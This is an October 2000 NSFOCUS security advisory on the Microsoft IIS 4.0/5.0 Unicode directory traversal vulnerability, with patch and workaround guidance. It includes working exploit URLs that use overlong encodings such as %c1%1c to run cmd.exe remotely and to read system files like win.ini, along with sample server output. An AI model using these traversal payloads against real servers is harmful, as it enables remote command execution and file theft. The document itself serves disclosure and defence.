[INLINE] [INLINE] [INLINE] NSFOCUS Security Advisory(SA2000-06) Topic: Microsoft IIS 4.0/5.0 Web Directory Traversal Vulnerability Release Date£º Oct 20, 2000 Affected system: ============ Microsoft IIS 4.0 Microsoft IIS 5.0 ¡¡¡¡- Microsoft Windows NT 4.0 ¡¡¡¡- Microsoft Windows 2000 Impact: ====== NSFOCUS security team has found a security flaw in Microsoft IIS 4.0/5.0 UNICODE decoding implementation. Exploitation of this vulnerability, It is possible that a malicious user can run arbitrary command or get the content of system file in the web server running vulnerable IIS remotely. Description£º ========= When IIS 5.0 (Chinese version) found "%c1%hh" and "%c0%hh" (0x00<= 0xhh < 0x40) in the file name, it will decode "%c1%hh" to (0xc1 -0xc0) * 0x40 + 0xhh, and decode "%c0%hh" to (0xc0 -0xc0) * 0x40 + 0xhh. For example (Windows 2000 + IIS 5.0 + SP1 for Simplify Chinese version): http://target/A.ida/%c1%00.ida IIS said "@.ida" can't be found here: £¨0xc1-0xc0)*0x40+0x00=0x40='@' http://target/A.ida/%c1%01.ida IIS said "A.ida" can't be found here: £¨0xc1-0xc0)*0x40+0x01=0x41='A' http://target/A.ida/%c1%02.ida IIS said "B.ida" can't be found ..... http://target/A.ida/%c0%21.ida IIS said "!.ida" can't be found .... It means you can encode most characters with this feature. For example: %c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/' %c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\' So attacker can bypass the IIS check for "..\" with this trick. It is possible to run arbitrary command and read the system file. Note: Rain Forest Puppy (rfp@WIRETRIP.NET) has found the same bug in IIS for other language versions. All it needs is to change "%c1%1c" into "%c1%9c", or change "%c0%2f" into "%c0%af". Exploit: ===== (1) run arbitrary command : http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir IIS will return like this : Directory of d:\inetpub\scripts 2000-09-28 15:49 . 2000-09-28 15:49 .. 1999-07-21 17:49¡¡¡¡¡¡¡¡¡¡147,456 ¡¡ Count.exe 2000-09-12 17:08 ¡¡¡¡¡¡¡¡ 1438,290 ¡¡Count25.exe 2000-10-13 15:03 ¡¡¡¡¡¡¡¡ 18,867 ¡¡¡¡ counter.err 2000-08-23 23:07 ¡¡¡¡¡¡¡¡ 1160,002 ¡¡counter.exe 1999-05-25 18:14 ¡¡¡¡¡¡¡¡ 13,925 ¡¡ ¡CCountNT.html 1999-07-21 17:49 ¡¡¡¡¡¡¡¡ 164,512 ¡ ¡ extdgts.exe 2000-08-10 15:24 ¡¡¡¡¡¡¡¡ 146,352 ¡¡¡¡ism.dll 1999-07-21 17:49 ¡¡¡¡¡¡¡¡ 164,512¡ ¡mkstrip.exe 1999-05-25 18:18 ¡¡¡¡¡¡¡¡ 11,317 ¡¡ ¡README.txt 2000-09-28 15:49 ¡¡¡¡¡¡¡¡¡¡¡¡¡¡wcount ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡9 File(s) ¡¡935,233 bytes (2) we can get the content of some system files with this bug too: http://target/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini IIS deems it to be a request for a .ASP file.It will call asp.dll to open the file win.ini. For IIS 4.0+SP6(Chinese), the URL above failed. It seems that IIS is getting smarter. But we found it is interesting that we can use this malformed URL to trick IIS to get the winnt.ini: http://target/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini "default.asp" should be an existing .ASP file. "a.exe" is random .EXE file name. It can be a nonexisting file. Workaround: ========= 1¡¢If executable CGI is not integrant, delete the executable virtual directory ¡¡¡¡like /scripts etc. 2¡¢If executable virtual directory is needed, we suggest you to assign a ¡¡¡¡separate local driver for it. Solution: ======= Microsoft has released one security bulletin concerning this flaw. The bulletin is live at : [1]http://www.microsoft.com/technet/security/bulletin/MS00-078.asp Patches are available at: . Microsoft IIS 4.0: [2]http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/de fault.asp . Microsoft IIS 5.0: [3]http://www.microsoft.com/windows2000/downloads/critical/q269862/def ault.asp DISCLAIMS: ======== THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY. ©Copyright 1999-2000 NSFOCUS. All Rights Reserved. Terms of use. NSFOCUS Security Team <[4]security@nsfocus.com> NSFOCUS INFORMATION TECHNOLOGY CO.,LTD ([5]http://www.nsfocus.com) ©2000 NSFOCUS information Technology Co.,Ltd. All rights Reserved. Contact:[6]webmaster@nsfocus.com References 1. http://www.microsoft.com/technet/security/bulletin/MS00-078.asp 2. http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp 3. http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp 4. mailto:security@nsfocus.com 5. http://www.nsfocus.com/ 6. mailto:webmaster@nsfocus.com